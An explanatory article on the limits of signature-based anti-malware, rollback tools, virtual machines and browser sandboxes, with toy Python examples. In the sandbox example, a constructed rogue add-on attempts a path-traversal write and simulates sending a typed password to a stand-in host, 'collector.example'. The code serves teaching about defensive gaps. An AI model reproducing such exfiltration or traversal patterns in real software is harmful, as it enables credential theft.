10. What’s Missing?

Problems with present anti-malware methods

The present way of protecting computers against malware such as viruses, worms, Trojans, and spyware is basically reactive. It depends on a local database of information about known malware in order to recognize and disarm the invaders. Some attempt is made at using so-called “heuristic” techniques to recognize new malware that is not in the database, but maintaining the protection still requires constant updating of the local database. Also, since the different types of malware have different behaviour patterns and signatures, more than one type of protection is needed. Although software suites may combine the different kinds of protection in one package, many people end up with a hodgepodge of different applications. For example, a user might have an anti-virus program, a software firewall, a hardware firewall, three anti-spyware programs, an email filter, two Trojan removers, and various Internet toolbars for blocking popups, ads, phishing, JavaScript, etc.

Having to run all these programs and having to constantly update them is not only cumbersome but also hurts system performance. The fact is, even with constant updating, systems are still vulnerable to so-called “zero-day” and undocumented exploits. The constant parade of new security problems makes it clear that something better than the current approach to safeguarding computers is needed.
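To make the “reactive” point concrete, here is an added example (not code from the original article, and not any vendor's scanner): a toy signature database keyed by file hash, plus a crude string-based heuristic. All sample bytes, marker strings and the `push_signature_update` helper are constructed for illustration. It shows that an exact match is caught, a near variant is only caught if the heuristic happens to cover its pattern, and an undocumented sample passes until the database is updated.

```python
import hashlib

# Constructed stand-ins for executables as read from disk (not real malware).
KNOWN_SAMPLE = b"MZ\x90\x00demo-payload-v1:open-socket;write-autorun"
VARIANT_SAMPLE = b"MZ\x90\x00demo-payload-v2:open-socket;write-autorun"
UNDOCUMENTED_SAMPLE = b"MZ\x90\x00demo-payload-v3:dns-beacon;registry-run"
CLEAN_SAMPLE = b"MZ\x90\x00hello-world-editor:open-file;save-file"


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# The local "signature database": hashes of samples already catalogued.
# Hypothetical contents; a real product ships far richer signatures.
signature_db = {sha256(KNOWN_SAMPLE)}

# A crude behaviour heuristic: flag files whose embedded strings suggest
# both persistence and network activity. Constructed for illustration.
SUSPICIOUS_MARKERS = (b"write-autorun", b"open-socket")


def signature_scan(data: bytes, db: set) -> bool:
    """Reactive check: only flags exact matches to previously seen samples."""
    return sha256(data) in db


def heuristic_scan(data: bytes) -> bool:
    """Catches unseen files only if they reuse a pattern the heuristic knows."""
    return all(marker in data for marker in SUSPICIOUS_MARKERS)


def verdict(data: bytes, db: set) -> str:
    if signature_scan(data, db):
        return "blocked: known signature"
    if heuristic_scan(data):
        return "flagged: heuristic"
    return "allowed"


def push_signature_update(db: set, new_sample: bytes) -> None:
    """What a vendor update does: add the hash of a newly catalogued sample."""
    db.add(sha256(new_sample))


if __name__ == "__main__":
    for name, sample in [("known", KNOWN_SAMPLE), ("variant", VARIANT_SAMPLE),
                         ("undocumented", UNDOCUMENTED_SAMPLE), ("clean", CLEAN_SAMPLE)]:
        print(f"{name:13s} -> {verdict(sample, signature_db)}")
    push_signature_update(signature_db, UNDOCUMENTED_SAMPLE)
    print("after update  ->", verdict(UNDOCUMENTED_SAMPLE, signature_db))
```

The gap between the third and fifth lines of output is the zero-day window the article describes: nothing on the local machine changes until the vendor has seen the sample and shipped the update.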

Rollback methods

There are already several possible alternative ways to go. One is the procedure used on many systems that are open to the public in places like libraries and schools. A standard system configuration is established and any changes, including malware, that occur on the system during an individual login session are erased when the user is finished. The system is simply returned to its standard configuration. Deep Freeze software is an example. People can do anything they want to the system or even get it infected by malware, but when it is rebooted it returns to its original pristine state. This is very satisfactory for a setup which remains static but can be tedious where a user installs a lot of new software or frequently creates new files.
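The rollback idea, and its cost, can be shown with a few lines of code. The following is an added example, not part of the original article and not how Deep Freeze or any product is implemented: a baseline snapshot of a directory tree is taken, a “session” drops a constructed malware file, edits a system file and creates a user document, and a restore returns the tree to the baseline. The directory layout and file contents are constructed for the demonstration.

```python
import tempfile
from pathlib import Path


def snapshot(root: Path) -> dict:
    """Record every file under root as relative-path -> bytes (the frozen baseline)."""
    return {p.relative_to(root).as_posix(): p.read_bytes()
            for p in root.rglob("*") if p.is_file()}


def restore(root: Path, baseline: dict) -> None:
    """Return root to the baseline: delete anything not in it, rewrite the rest."""
    for p in list(root.rglob("*")):
        if p.is_file() and p.relative_to(root).as_posix() not in baseline:
            p.unlink()
    for rel, data in baseline.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(data)
    # Remove directories the session created and that are now empty, deepest first.
    for p in sorted(root.rglob("*"), key=lambda q: len(q.parts), reverse=True):
        if p.is_dir() and not any(p.iterdir()):
            p.rmdir()


def simulate_session() -> dict:
    """Run one constructed login session against a temporary 'system' and roll it back."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "system").mkdir()
        (root / "system" / "hosts").write_text("127.0.0.1 localhost\n")
        (root / "apps").mkdir()
        (root / "apps" / "browser.cfg").write_text("homepage=about:blank\n")
        baseline = snapshot(root)

        # During the session: a constructed dropper persists itself and edits hosts,
        # and the user also writes a document they would want to keep.
        (root / "system" / "autorun.bin").write_bytes(b"constructed-dropper")
        (root / "system" / "hosts").write_text("127.0.0.1 localhost\n0.0.0.0 updates.example\n")
        (root / "users").mkdir()
        (root / "users" / "thesis.txt").write_text("Chapter 1")
        during = snapshot(root)

        restore(root, baseline)   # the "reboot"
        after = snapshot(root)
        return {"baseline": baseline, "during": during, "after": after}


if __name__ == "__main__":
    result = simulate_session()
    print("files during session:", sorted(result["during"]))
    print("files after rollback:", sorted(result["after"]))
```

The rollback does its job: the dropper and the hosts edit are gone. But `users/thesis.txt` is gone too, which is exactly why the approach is tedious for anyone who creates files or installs software between reboots.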

Virtual machines

Another approach that is attracting more and more attention is the use of “virtual” machines. The equivalent of several independent operating systems can be created on one computer. This is especially attractive for those who install or test a lot of software. You can have one virtual machine that is the standard setup and another test machine that gets exposed to the Internet. If the test machine gets infected, it is deleted and the standard setup is copied. Creation of new data files on a virtual machine is no different from a regular computer. Installation of new software can be tried on the test machine first to make sure that the software is legitimate or has no undesirable effects. It is also possible to have a host machine that can access a virtual machine while the virtual machine is ignorant of the existence of the host. The average home PC user, however, may not be quite ready for the virtual machine approach.

Sandboxes for Internet browsers

Related to virtual machines are “sandboxes”. This technique creates an area on the system that is isolated from the rest of the system. Any malware infection that occurs in the sandbox is prevented from spreading system-wide. By placing the Internet browser in the sandbox, infections from the Internet are quarantined to the sandbox.

What these approaches cannot do

Inherent in many of the sandbox products is the idea that end-users must make a trust decision on whether to erase, save, or execute downloaded content. Taken to one extreme, if end-users erase all content after every session, how would their system, applications, or browsers receive upgrades or security patches? Taken to the other extreme, if users save or execute all content, they will end up infected or negate the need for the additional protection. Ultimately, with varying levels of assistance from the product, the end-user must make the key decision on whether or not to save and execute the data from each session.

None of these alternative techniques can detect malware that is already running. So if the user is tricked, for instance through social engineering, into installing malware disguised as a legitimate browser add-on, the sandbox running the browser instance or the virtual machine will not alert the user to anything. Moreover, if spyware is installed in a sandboxed browser instance, all the sensitive information recorded by the spyware during that session can be stolen without the sandbox or virtual machine raising any exception.
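The distinction the last two paragraphs draw, between confining what the browser can change and detecting what runs inside it, is easy to see in a toy model. The following is an added example, not code from the original article and not a model of any particular sandbox product: a `BrowserSandbox` class that refuses writes outside its root but, like any browser, must allow network sends; a constructed `rogue_addon` running inside it has its persistence attempt refused yet reads the session's form data and sends it out without any policy being violated. Paths, host names and form values are constructed.

```python
import posixpath


class BrowserSandbox:
    """Toy model of a filesystem sandbox around a browser. Constructed for
    illustration; it only confines side effects, it has no detection logic."""

    def __init__(self, root: str = "/sandbox/browser"):
        self.root = root
        self.session_data = []    # what the user types into web forms this session
        self.refused_writes = []  # writes outside the sandbox that were blocked
        self.outbound = []        # network sends; ordinary browser behaviour

    def _inside_sandbox(self, path: str) -> bool:
        # normpath collapses "..", so "/sandbox/browser/../../x" is judged correctly
        norm = posixpath.normpath(path)
        return norm == self.root or norm.startswith(self.root + "/")

    def write_file(self, path: str, data: bytes) -> bool:
        """Confinement: persist only inside the sandbox; anything else is refused."""
        if not self._inside_sandbox(path):
            self.refused_writes.append(path)
            return False
        return True

    def user_types(self, field: str, value: str) -> None:
        self.session_data.append((field, value))

    def send(self, host: str, payload) -> bool:
        """The sandbox cannot forbid network traffic without breaking the browser."""
        self.outbound.append((host, payload))
        return True


def rogue_addon(sandbox: BrowserSandbox) -> bool:
    """Stands in for a socially engineered 'add-on' running inside the sandbox.
    Returns whether its attempt to persist outside the sandbox succeeded."""
    persisted = sandbox.write_file("/sandbox/browser/../../system/autorun.bin",
                                   b"constructed")
    # Reading what the user typed and sending it is indistinguishable, to the
    # sandbox, from a legitimate form submission.
    sandbox.send("collector.example", list(sandbox.session_data))
    return persisted


def run_session() -> BrowserSandbox:
    """One constructed browsing session with the rogue add-on installed."""
    sb = BrowserSandbox()
    sb.user_types("username", "alice")
    sb.user_types("password", "constructed-secret")
    rogue_addon(sb)
    return sb


if __name__ == "__main__":
    sb = run_session()
    print("refused writes:", sb.refused_writes)
    print("outbound sends:", sb.outbound)
```

The refused write is the sandbox working as designed; the outbound send carrying the typed password is the gap the article points to. Nothing in the confinement policy can tell that send apart from the browser's normal traffic, so the session data leaves the machine with no exception raised.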

What’s missing?

Hence a user remains vulnerable, to varying degrees, to all sorts of security threats on the Internet, in spite of employing the best known anti-malware mechanisms. A more complete solution is needed to fill this void.

